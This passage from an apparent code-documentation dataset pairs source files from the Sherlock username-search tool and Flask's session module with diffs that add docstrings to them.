                do_not_exclude=args.site_list,
            )
    except Exception as error:
        print(f"ERROR: {error}")
        sys.exit(1)
    if not args.nsfw:
        # NSFW sites are skipped by default, except those explicitly
        # requested via --site.
        sites.remove_nsfw_sites(do_not_remove=args.site_list)
    # Create original dictionary from SitesInformation() object.
    # Eventually, the rest of the code will be updated to use the new object
    # directly, but this will glue the two pieces together.
    site_data_all = {site.name: site.information for site in sites}
    if args.site_list == []:
        # Not desired to look at a sub-set of sites
        site_data = site_data_all
    else:
        # User desires to selectively run queries on a sub-set of the site list.
        # Make sure that the sites are supported & build up pruned site database.
        site_data = {}
        site_missing = []
        for site in args.site_list:
            counter = 0
            # Case-insensitive match against the known site names.
            for existing_site in site_data_all:
                if site.lower() == existing_site.lower():
                    site_data[existing_site] = site_data_all[existing_site]
                    counter += 1
            if counter == 0:
                # Build up list of sites not supported for future error message.
                site_missing.append(f"'{site}'")
        if site_missing:
            print(f"Error: Desired sites not found: {', '.join(site_missing)}.")
        if not site_data:
            # Every requested site was unknown; nothing to query.
            sys.exit(1)
    # Create notify object for query results.
    query_notify = QueryNotifyPrint(
        result=None, verbose=args.verbose, print_all=args.print_all, browse=args.browse
    )
    # Run report on all specified users.
    # Expand any username containing the "{?}" token into its variants.
    all_usernames = []
    for username in args.username:
        if check_for_parameter(username):
            for name in multiple_usernames(username):
                all_usernames.append(name)
        else:
            all_usernames.append(username)
    for username in all_usernames:
        results = sherlock(
            username,
            site_data,
            query_notify,
            dump_response=args.dump_response,
            proxy=args.proxy,
            timeout=args.timeout,
        )
        # Decide where the txt report (if any) should go.
        if args.output:
            result_file = args.output
        elif args.folderoutput:
            # The usernames results should be stored in a targeted folder.
            # If the folder doesn't exist, create it first
            os.makedirs(args.folderoutput, exist_ok=True)
            result_file = os.path.join(args.folderoutput, f"{username}.txt")
        else:
            result_file = f"{username}.txt"
        if args.output_txt:
            with open(result_file, "w", encoding="utf-8") as file:
                exists_counter = 0
                for website_name in results:
                    dictionary = results[website_name]
                    if dictionary.get("status").status == QueryStatus.CLAIMED:
                        exists_counter += 1
                        file.write(dictionary["url_user"] + "\n")
                file.write(f"Total Websites Username Detected On : {exists_counter}\n")
        if args.csv:
            result_file = f"{username}.csv"
            if args.folderoutput:
                # The usernames results should be stored in a targeted folder.
                # If the folder doesn't exist, create it first
                os.makedirs(args.folderoutput, exist_ok=True)
                result_file = os.path.join(args.folderoutput, result_file)
            with open(result_file, "w", newline="", encoding="utf-8") as csv_report:
                writer = csv.writer(csv_report)
                writer.writerow(
                    [
                        "username",
                        "name",
                        "url_main",
                        "url_user",
                        "exists",
                        "http_status",
                        "response_time_s",
                    ]
                )
                for site in results:
                    # Unless --print-all was given, only claimed accounts are
                    # exported.
                    if (
                        args.print_found
                        and not args.print_all
                        and results[site]["status"].status != QueryStatus.CLAIMED
                    ):
                        continue
                    response_time_s = results[site]["status"].query_time
                    if response_time_s is None:
                        response_time_s = ""
                    writer.writerow(
                        [
                            username,
                            site,
                            results[site]["url_main"],
                            results[site]["url_user"],
                            str(results[site]["status"].status),
                            results[site]["http_status"],
                            response_time_s,
                        ]
                    )
        if args.xlsx:
            # Column accumulators for the spreadsheet, built row-by-row.
            usernames = []
            names = []
            url_main = []
            url_user = []
            exists = []
            http_status = []
            response_time_s = []
            for site in results:
                if (
                    args.print_found
                    and not args.print_all
                    and results[site]["status"].status != QueryStatus.CLAIMED
                ):
                    continue
                # NOTE(review): response_time_s is a list here and is never
                # None, so this branch never fires; the check was presumably
                # meant to test results[site]["status"].query_time (as the
                # csv branch above does) — confirm before changing.
                if response_time_s is None:
                    response_time_s.append("")
                else:
                    response_time_s.append(results[site]["status"].query_time)
                usernames.append(username)
                names.append(site)
                url_main.append(results[site]["url_main"])
                url_user.append(results[site]["url_user"])
                exists.append(str(results[site]["status"].status))
                http_status.append(results[site]["http_status"])
            DataFrame = pd.DataFrame(
                {
                    "username": usernames,
                    "name": names,
                    # HYPERLINK formulas make the URLs clickable in Excel.
                    "url_main": [f'=HYPERLINK(\"{u}\")' for u in url_main],
                    "url_user": [f'=HYPERLINK(\"{u}\")' for u in url_user],
                    "exists": exists,
                    "http_status": http_status,
                    "response_time_s": response_time_s,
                }
            )
            DataFrame.to_excel(f"{username}.xlsx", sheet_name="sheet1", index=False)
        print()
    query_notify.finish()
# Allow running this file directly as a script as well as via the package
# entry point.
if __name__ == "__main__":
    main()
+"""
+Sherlock: Find Usernames Across Social Networks Module
+
+This module contains the main logic to search for usernames at social
+networks.
+"""
import sys
@@ -41,12 +47,42 @@
class SherlockFuturesSession(FuturesSession):
def request(self, method, url, hooks=None, *args, **kwargs):
+ """Request URL.
+
+ This extends the FuturesSession request method to calculate a response
+ time metric to each request.
+
+ It is taken (almost) directly from the following Stack Overflow answer:
+ https://github.com/ross/requests-futures#working-in-the-background
+
+ Keyword Arguments:
+ self -- This object.
+ method -- String containing method desired for request.
+ url -- String containing URL for request.
+ hooks -- Dictionary containing hooks to execute after
+ request finishes.
+ args -- Arguments.
+ kwargs -- Keyword arguments.
+
+ Return Value:
+ Request object.
+ """
# Record the start time for the request.
if hooks is None:
hooks = {}
start = monotonic()
def response_time(resp, *args, **kwargs):
+ """Response Time Hook.
+
+ Keyword Arguments:
+ resp -- Response object.
+ args -- Arguments.
+ kwargs -- Keyword arguments.
+
+ Return Value:
+ Nothing.
+ """
resp.elapsed = monotonic() - start
return
@@ -115,6 +151,8 @@
def check_for_parameter(username):
+ """checks if {?} exists in the username
+ if exist it means that sherlock is looking for more multiple username"""
return "{?}" in username
@@ -122,6 +160,7 @@
def multiple_usernames(username):
+ """replace the parameter with with symbols and return a list of usernames"""
allUsernames = []
for i in checksymbols:
allUsernames.append(username.replace("{?}", i))
@@ -136,6 +175,34 @@ proxy: Optional[str] = None,
timeout: int = 60,
) -> dict[str, dict[str, str | QueryResult]]:
+ """Run Sherlock Analysis.
+
+ Checks for existence of username on various social media sites.
+
+ Keyword Arguments:
+ username -- String indicating username that report
+ should be created against.
+ site_data -- Dictionary containing all of the site data.
+ query_notify -- Object with base type of QueryNotify().
+ This will be used to notify the caller about
+ query results.
+ proxy -- String indicating the proxy URL
+ timeout -- Time in seconds to wait before timing out request.
+ Default is 60 seconds.
+
+ Return Value:
+ Dictionary containing results from report. Key of dictionary is the name
+ of the social network site, and the value is another dictionary with
+ the following keys:
+ url_main: URL of main site.
+ url_user: URL of user on site (if account exists).
+ status: QueryResult() object indicating results of test for
+ account existence.
+ http_status: HTTP status code of query which checked for existence on
+ site.
+ response_text: Text that came back from request. May be None if
+ there was an HTTP error when checking for existence.
+ """
# Notify caller that we are starting the query.
query_notify.start(username)
@@ -436,6 +503,19 @@
def timeout_check(value):
+ """Check Timeout Argument.
+
+ Checks timeout for validity.
+
+ Keyword Arguments:
+ value -- Time in seconds to wait before timing out request.
+
+ Return Value:
+ Floating point number representing the time (in seconds) that should be
+ used for the timeout.
+
+ NOTE: Will raise an exception if the timeout in invalid.
+ """
float_value = float(value)
@@ -448,6 +528,10 @@
def handler(signal_received, frame):
+ """Exit gracefully without throwing errors
+
+ Source: https://www.devdungeon.com/content/python-catch-sigint-ctrl-c
+ """
sys.exit(0)
@@ -855,4 +939,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/sherlock.py |
Add clean documentation to messy code | from sherlock_project.result import QueryStatus
from colorama import Fore, Style
import webbrowser
# Global variable to count the number of results.
globvar = 0
class QueryNotify:
def __init__(self, result=None):
self.result = result
# return
def start(self, message=None):
# return
def update(self, result):
self.result = result
# return
def finish(self, message=None):
# return
def __str__(self):
return str(self.result)
class QueryNotifyPrint(QueryNotify):
def __init__(self, result=None, verbose=False, print_all=False, browse=False):
super().__init__(result)
self.verbose = verbose
self.print_all = print_all
self.browse = browse
return
def start(self, message):
title = "Checking username"
print(Style.BRIGHT + Fore.GREEN + "[" +
Fore.YELLOW + "*" +
Fore.GREEN + f"] {title}" +
Fore.WHITE + f" {message}" +
Fore.GREEN + " on:")
# An empty line between first line and the result(more clear output)
print('\r')
return
def countResults(self):
global globvar
globvar += 1
return globvar
def update(self, result):
self.result = result
response_time_text = ""
if self.result.query_time is not None and self.verbose is True:
response_time_text = f" [{round(self.result.query_time * 1000)}ms]"
# Output to the terminal is desired.
if result.status == QueryStatus.CLAIMED:
self.countResults()
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.GREEN + "+" +
Fore.WHITE + "]" +
response_time_text +
Fore.GREEN +
f" {self.result.site_name}: " +
Style.RESET_ALL +
f"{self.result.site_url_user}")
if self.browse:
webbrowser.open(self.result.site_url_user, 2)
elif result.status == QueryStatus.AVAILABLE:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
response_time_text +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.YELLOW + " Not Found!")
elif result.status == QueryStatus.UNKNOWN:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.RED + f" {self.result.context}" +
Fore.YELLOW + " ")
elif result.status == QueryStatus.ILLEGAL:
if self.print_all:
msg = "Illegal Username Format For This Site!"
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.YELLOW + f" {msg}")
elif result.status == QueryStatus.WAF:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.RED + " Blocked by bot detection" +
Fore.YELLOW + " (proxy may help)")
else:
# It should be impossible to ever get here...
raise ValueError(
f"Unknown Query Status '{result.status}' for site '{self.result.site_name}'"
)
return
def finish(self, message="The processing has been finished."):
NumberOfResults = self.countResults() - 1
print(Style.BRIGHT + Fore.GREEN + "[" +
Fore.YELLOW + "*" +
Fore.GREEN + "] Search completed with" +
Fore.WHITE + f" {NumberOfResults} " +
Fore.GREEN + "results" + Style.RESET_ALL
)
def __str__(self):
return str(self.result) | --- +++ @@ -1,3 +1,8 @@+"""Sherlock Notify Module
+
+This module defines the objects for notifying the caller about the
+results of queries.
+"""
from sherlock_project.result import QueryStatus
from colorama import Fore, Style
import webbrowser
@@ -7,34 +12,125 @@
class QueryNotify:
+ """Query Notify Object.
+
+ Base class that describes methods available to notify the results of
+ a query.
+ It is intended that other classes inherit from this base class and
+ override the methods to implement specific functionality.
+ """
def __init__(self, result=None):
+ """Create Query Notify Object.
+
+ Contains information about a specific method of notifying the results
+ of a query.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
# return
def start(self, message=None):
+ """Notify Start.
+
+ Notify method for start of query. This method will be called before
+ any queries are performed. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- Object that is used to give context to start
+ of query.
+ Default is None.
+
+ Return Value:
+ Nothing.
+ """
# return
def update(self, result):
+ """Notify Update.
+
+ Notify method for query result. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
# return
def finish(self, message=None):
+ """Notify Finish.
+
+ Notify method for finish of query. This method will be called after
+ all queries have been performed. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- Object that is used to give context to start
+ of query.
+ Default is None.
+
+ Return Value:
+ Nothing.
+ """
# return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return str(self.result)
class QueryNotifyPrint(QueryNotify):
+ """Query Notify Print Object.
+
+ Query notify class that prints results.
+ """
def __init__(self, result=None, verbose=False, print_all=False, browse=False):
+ """Create Query Notify Print Object.
+
+ Contains information about a specific method of notifying the results
+ of a query.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+ verbose -- Boolean indicating whether to give verbose output.
+ print_all -- Boolean indicating whether to only print all sites, including not found.
+ browse -- Boolean indicating whether to open found sites in a web browser.
+
+ Return Value:
+ Nothing.
+ """
super().__init__(result)
self.verbose = verbose
@@ -44,6 +140,18 @@ return
def start(self, message):
+ """Notify Start.
+
+ Will print the title to the standard output.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- String containing username that the series
+ of queries are about.
+
+ Return Value:
+ Nothing.
+ """
title = "Checking username"
@@ -58,11 +166,32 @@ return
def countResults(self):
+ """This function counts the number of results. Every time the function is called,
+ the number of results is increasing.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ The number of results by the time we call the function.
+ """
global globvar
globvar += 1
return globvar
def update(self, result):
+ """Notify Update.
+
+ Will print the query result to the standard output.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
response_time_text = ""
@@ -128,6 +257,14 @@ return
def finish(self, message="The processing has been finished."):
+ """Notify Start.
+ Will print the last line to the standard output.
+ Keyword Arguments:
+ self -- This object.
+ message -- The 2 last phrases.
+ Return Value:
+ Nothing.
+ """
NumberOfResults = self.countResults() - 1
print(Style.BRIGHT + Fore.GREEN + "[" +
@@ -138,4 +275,12 @@ )
def __str__(self):
- return str(self.result)+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
+ return str(self.result)
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/notify.py |
Write reusable docstrings |
from importlib.metadata import version as pkg_version, PackageNotFoundError
import pathlib
import tomli
def get_version() -> str:
try:
return pkg_version("sherlock_project")
except PackageNotFoundError:
pyproject_path: pathlib.Path = pathlib.Path(__file__).resolve().parent.parent / "pyproject.toml"
with pyproject_path.open("rb") as f:
pyproject_data = tomli.load(f)
return pyproject_data["tool"]["poetry"]["version"]
# This variable is only used to check for ImportErrors induced by users running as script rather than as module or package
import_error_test_var = None
__shortname__ = "Sherlock"
__longname__ = "Sherlock: Find Usernames Across Social Networks"
__version__ = get_version()
forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest" | --- +++ @@ -1,3 +1,9 @@+""" Sherlock Module
+
+This module contains the main logic to search for usernames at social
+networks.
+
+"""
from importlib.metadata import version as pkg_version, PackageNotFoundError
import pathlib
@@ -5,6 +11,7 @@
def get_version() -> str:
+ """Fetch the version number of the installed package."""
try:
return pkg_version("sherlock_project")
except PackageNotFoundError:
@@ -20,4 +27,4 @@ __longname__ = "Sherlock: Find Usernames Across Social Networks"
__version__ = get_version()
-forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest"+forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest"
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/__init__.py |
Generate docstrings for exported functions | import json
import requests
import secrets
MANIFEST_URL = "https://raw.githubusercontent.com/sherlock-project/sherlock/master/sherlock_project/resources/data.json"
EXCLUSIONS_URL = "https://raw.githubusercontent.com/sherlock-project/sherlock/refs/heads/exclusions/false_positive_exclusions.txt"
class SiteInformation:
def __init__(self, name, url_home, url_username_format, username_claimed,
information, is_nsfw, username_unclaimed=secrets.token_urlsafe(10)):
self.name = name
self.url_home = url_home
self.url_username_format = url_username_format
self.username_claimed = username_claimed
self.username_unclaimed = secrets.token_urlsafe(32)
self.information = information
self.is_nsfw = is_nsfw
return
def __str__(self):
return f"{self.name} ({self.url_home})"
class SitesInformation:
def __init__(
self,
data_file_path: str|None = None,
honor_exclusions: bool = True,
do_not_exclude: list[str] = [],
):
if not data_file_path:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
# this instead of the local one is so that the user has the most up-to-date data. This prevents
# users from creating issue about false positives which has already been fixed or having outdated data
data_file_path = MANIFEST_URL
# Ensure that specified data file has correct extension.
if not data_file_path.lower().endswith(".json"):
raise FileNotFoundError(f"Incorrect JSON file extension for data file '{data_file_path}'.")
# if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower():
if data_file_path.lower().startswith("http"):
# Reference is to a URL.
try:
response = requests.get(url=data_file_path, timeout=30)
except Exception as error:
raise FileNotFoundError(
f"Problem while attempting to access data file URL '{data_file_path}': {error}"
)
if response.status_code != 200:
raise FileNotFoundError(f"Bad response while accessing "
f"data file URL '{data_file_path}'."
)
try:
site_data = response.json()
except Exception as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': {error}."
)
else:
# Reference is to a file.
try:
with open(data_file_path, "r", encoding="utf-8") as file:
try:
site_data = json.load(file)
except Exception as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': {error}."
)
except FileNotFoundError:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file '{data_file_path}'."
)
site_data.pop('$schema', None)
if honor_exclusions:
try:
response = requests.get(url=EXCLUSIONS_URL, timeout=10)
if response.status_code == 200:
exclusions = response.text.splitlines()
exclusions = [exclusion.strip() for exclusion in exclusions]
for site in do_not_exclude:
if site in exclusions:
exclusions.remove(site)
for exclusion in exclusions:
try:
site_data.pop(exclusion, None)
except KeyError:
pass
except Exception:
# If there was any problem loading the exclusions, just continue without them
print("Warning: Could not load exclusions, continuing without them.")
honor_exclusions = False
self.sites = {}
# Add all site information from the json file to internal site list.
for site_name in site_data:
try:
self.sites[site_name] = \
SiteInformation(site_name,
site_data[site_name]["urlMain"],
site_data[site_name]["url"],
site_data[site_name]["username_claimed"],
site_data[site_name],
site_data[site_name].get("isNSFW",False)
)
except KeyError as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': Missing attribute {error}."
)
except TypeError:
print(f"Encountered TypeError parsing json contents for target '{site_name}' at {data_file_path}\nSkipping target.\n")
return
def remove_nsfw_sites(self, do_not_remove: list = []):
sites = {}
do_not_remove = [site.casefold() for site in do_not_remove]
for site in self.sites:
if self.sites[site].is_nsfw and site.casefold() not in do_not_remove:
continue
sites[site] = self.sites[site]
self.sites = sites
def site_name_list(self):
return sorted([site.name for site in self], key=str.lower)
def __iter__(self):
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
return len(self.sites) | --- +++ @@ -1,3 +1,8 @@+"""Sherlock Sites Information Module
+
+This module supports storing information about websites.
+This is the raw data that will be used to search for usernames.
+"""
import json
import requests
import secrets
@@ -9,6 +14,42 @@ class SiteInformation:
def __init__(self, name, url_home, url_username_format, username_claimed,
information, is_nsfw, username_unclaimed=secrets.token_urlsafe(10)):
+ """Create Site Information Object.
+
+ Contains information about a specific website.
+
+ Keyword Arguments:
+ self -- This object.
+ name -- String which identifies site.
+ url_home -- String containing URL for home of site.
+ url_username_format -- String containing URL for Username format
+ on site.
+ NOTE: The string should contain the
+ token "{}" where the username should
+ be substituted. For example, a string
+ of "https://somesite.com/users/{}"
+ indicates that the individual
+ usernames would show up under the
+ "https://somesite.com/users/" area of
+ the website.
+ username_claimed -- String containing username which is known
+ to be claimed on website.
+ username_unclaimed -- String containing username which is known
+ to be unclaimed on website.
+ information -- Dictionary containing all known information
+ about website.
+ NOTE: Custom information about how to
+ actually detect the existence of the
+ username will be included in this
+ dictionary. This information will
+ be needed by the detection method,
+ but it is only recorded in this
+ object for future use.
+ is_nsfw -- Boolean indicating if site is Not Safe For Work.
+
+ Return Value:
+ Nothing.
+ """
self.name = name
self.url_home = url_home
@@ -22,6 +63,14 @@ return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return f"{self.name} ({self.url_home})"
@@ -33,6 +82,38 @@ honor_exclusions: bool = True,
do_not_exclude: list[str] = [],
):
+ """Create Sites Information Object.
+
+ Contains information about all supported websites.
+
+ Keyword Arguments:
+ self -- This object.
+ data_file_path -- String which indicates path to data file.
+ The file name must end in ".json".
+
+ There are 3 possible formats:
+ * Absolute File Format
+ For example, "c:/stuff/data.json".
+ * Relative File Format
+ The current working directory is used
+ as the context.
+ For example, "data.json".
+ * URL Format
+ For example,
+ "https://example.com/data.json", or
+ "http://example.com/data.json".
+
+ An exception will be thrown if the path
+ to the data file is not in the expected
+ format, or if there was any problem loading
+ the file.
+
+ If this option is not specified, then a
+ default site list will be used.
+
+ Return Value:
+ Nothing.
+ """
if not data_file_path:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
@@ -130,6 +211,15 @@ return
def remove_nsfw_sites(self, do_not_remove: list = []):
+ """
+ Remove NSFW sites from the sites, if isNSFW flag is true for site
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ None
+ """
sites = {}
do_not_remove = [site.casefold() for site in do_not_remove]
for site in self.sites:
@@ -139,13 +229,37 @@ self.sites = sites
def site_name_list(self):
+ """Get Site Name List.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ List of strings containing names of sites.
+ """
return sorted([site.name for site in self], key=str.lower)
def __iter__(self):
+ """Iterator For Object.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Iterator for sites object.
+ """
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
- return len(self.sites)+ """Length For Object.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Length of sites object.
+ """
+ return len(self.sites)
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/sites.py |
Add docstrings to make code maintainable | from __future__ import annotations
import collections.abc as c
import hashlib
import typing as t
from collections.abc import MutableMapping
from datetime import datetime
from datetime import timezone
from itsdangerous import BadSignature
from itsdangerous import URLSafeTimedSerializer
from werkzeug.datastructures import CallbackDict
from .json.tag import TaggedJSONSerializer
if t.TYPE_CHECKING: # pragma: no cover
import typing_extensions as te
from .app import Flask
from .wrappers import Request
from .wrappers import Response
class SessionMixin(MutableMapping[str, t.Any]):
@property
def permanent(self) -> bool:
return self.get("_permanent", False) # type: ignore[no-any-return]
@permanent.setter
def permanent(self, value: bool) -> None:
self["_permanent"] = bool(value)
#: Some implementations can detect whether a session is newly
#: created, but that is not guaranteed. Use with caution. The mixin
# default is hard-coded ``False``.
new = False
#: Some implementations can detect changes to the session and set
#: this when that happens. The mixin default is hard coded to
#: ``True``.
modified = True
accessed = False
"""Indicates if the session was accessed, even if it was not modified. This
is set when the session object is accessed through the request context,
including the global :data:`.session` proxy. A ``Vary: cookie`` header will
be added if this is ``True``.
.. versionchanged:: 3.1.3
This is tracked by the request context.
"""
class SecureCookieSession(CallbackDict[str, t.Any], SessionMixin):
#: When data is changed, this is set to ``True``. Only the session
#: dictionary itself is tracked; if the session contains mutable
#: data (for example a nested dict) then this must be set to
#: ``True`` manually when modifying that data. The session cookie
#: will only be written to the response if this is ``True``.
modified = False
def __init__(
self,
initial: c.Mapping[str, t.Any] | None = None,
) -> None:
def on_update(self: te.Self) -> None:
self.modified = True
super().__init__(initial, on_update)
class NullSession(SecureCookieSession):
def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
raise RuntimeError(
"The session is unavailable because no secret "
"key was set. Set the secret_key on the "
"application to something unique and secret."
)
__setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail
del _fail
class SessionInterface:
#: :meth:`make_null_session` will look here for the class that should
#: be created when a null session is requested. Likewise the
#: :meth:`is_null_session` method will perform a typecheck against
#: this type.
null_session_class = NullSession
#: A flag that indicates if the session interface is pickle based.
#: This can be used by Flask extensions to make a decision in regards
#: to how to deal with the session object.
#:
#: .. versionadded:: 0.10
pickle_based = False
def make_null_session(self, app: Flask) -> NullSession:
return self.null_session_class()
def is_null_session(self, obj: object) -> bool:
return isinstance(obj, self.null_session_class)
def get_cookie_name(self, app: Flask) -> str:
return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return]
def get_cookie_domain(self, app: Flask) -> str | None:
return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return]
def get_cookie_path(self, app: Flask) -> str:
return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return]
def get_cookie_httponly(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return]
def get_cookie_secure(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return]
def get_cookie_samesite(self, app: Flask) -> str | None:
return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return]
def get_cookie_partitioned(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_PARTITIONED"] # type: ignore[no-any-return]
def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None:
if session.permanent:
return datetime.now(timezone.utc) + app.permanent_session_lifetime
return None
def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool:
return session.modified or (
session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"]
)
def open_session(self, app: Flask, request: Request) -> SessionMixin | None:
raise NotImplementedError()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
raise NotImplementedError()
session_json_serializer = TaggedJSONSerializer()
def _lazy_sha1(string: bytes = b"") -> t.Any:
return hashlib.sha1(string)
class SecureCookieSessionInterface(SessionInterface):
#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
salt = "cookie-session"
#: the hash function to use for the signature. The default is sha1
digest_method = staticmethod(_lazy_sha1)
#: the name of the itsdangerous supported key derivation. The default
#: is hmac.
key_derivation = "hmac"
#: A python serializer for the payload. The default is a compact
#: JSON derived serializer with support for some extra Python types
#: such as datetime objects or tuples.
serializer = session_json_serializer
session_class = SecureCookieSession
def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None:
if not app.secret_key:
return None
keys: list[str | bytes] = []
if fallbacks := app.config["SECRET_KEY_FALLBACKS"]:
keys.extend(fallbacks)
keys.append(app.secret_key) # itsdangerous expects current key at top
return URLSafeTimedSerializer(
keys, # type: ignore[arg-type]
salt=self.salt,
serializer=self.serializer,
signer_kwargs={
"key_derivation": self.key_derivation,
"digest_method": self.digest_method,
},
)
def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None:
s = self.get_signing_serializer(app)
if s is None:
return None
val = request.cookies.get(self.get_cookie_name(app))
if not val:
return self.session_class()
max_age = int(app.permanent_session_lifetime.total_seconds())
try:
data = s.loads(val, max_age=max_age)
return self.session_class(data)
except BadSignature:
return self.session_class()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
name = self.get_cookie_name(app)
domain = self.get_cookie_domain(app)
path = self.get_cookie_path(app)
secure = self.get_cookie_secure(app)
partitioned = self.get_cookie_partitioned(app)
samesite = self.get_cookie_samesite(app)
httponly = self.get_cookie_httponly(app)
# Add a "Vary: Cookie" header if the session was accessed at all.
if session.accessed:
response.vary.add("Cookie")
# If the session is modified to be empty, remove the cookie.
# If the session is empty, return without setting the cookie.
if not session:
if session.modified:
response.delete_cookie(
name,
domain=domain,
path=path,
secure=secure,
partitioned=partitioned,
samesite=samesite,
httponly=httponly,
)
response.vary.add("Cookie")
return
if not self.should_set_cookie(app, session):
return
expires = self.get_expiration_time(app, session)
val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore[union-attr]
response.set_cookie(
name,
val,
expires=expires,
httponly=httponly,
domain=domain,
path=path,
secure=secure,
partitioned=partitioned,
samesite=samesite,
)
response.vary.add("Cookie") | --- +++ @@ -22,9 +22,11 @@
class SessionMixin(MutableMapping[str, t.Any]):
+ """Expands a basic dictionary with session attributes."""
@property
def permanent(self) -> bool:
+ """This reflects the ``'_permanent'`` key in the dict."""
return self.get("_permanent", False) # type: ignore[no-any-return]
@permanent.setter
@@ -53,6 +55,13 @@
class SecureCookieSession(CallbackDict[str, t.Any], SessionMixin):
+ """Base class for sessions based on signed cookies.
+
+ This session backend will set the :attr:`modified` and
+ :attr:`accessed` attributes. It cannot reliably track whether a
+ session is new (vs. empty), so :attr:`new` remains hard coded to
+ ``False``.
+ """
#: When data is changed, this is set to ``True``. Only the session
#: dictionary itself is tracked; if the session contains mutable
@@ -72,6 +81,10 @@
class NullSession(SecureCookieSession):
+ """Class used to generate nicer error messages if sessions are not
+ available. Will still allow read-only access to the empty session
+ but fail on setting.
+ """
def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
raise RuntimeError(
@@ -85,6 +98,41 @@
class SessionInterface:
+ """The basic interface you have to implement in order to replace the
+ default session interface which uses werkzeug's securecookie
+ implementation. The only methods you have to implement are
+ :meth:`open_session` and :meth:`save_session`, the others have
+ useful defaults which you don't need to change.
+
+ The session object returned by the :meth:`open_session` method has to
+ provide a dictionary like interface plus the properties and methods
+ from the :class:`SessionMixin`. We recommend just subclassing a dict
+ and adding that mixin::
+
+ class Session(dict, SessionMixin):
+ pass
+
+ If :meth:`open_session` returns ``None`` Flask will call into
+ :meth:`make_null_session` to create a session that acts as replacement
+ if the session support cannot work because some requirement is not
+ fulfilled. The default :class:`NullSession` class that is created
+ will complain that the secret key was not set.
+
+ To replace the session interface on an application all you have to do
+ is to assign :attr:`flask.Flask.session_interface`::
+
+ app = Flask(__name__)
+ app.session_interface = MySessionInterface()
+
+ Multiple requests with the same session may be sent and handled
+ concurrently. When implementing a new session interface, consider
+ whether reads or writes to the backing store must be synchronized.
+ There is no guarantee on the order in which the session for each
+ request is opened or saved, it will occur in the order that requests
+ begin and end processing.
+
+ .. versionadded:: 0.8
+ """
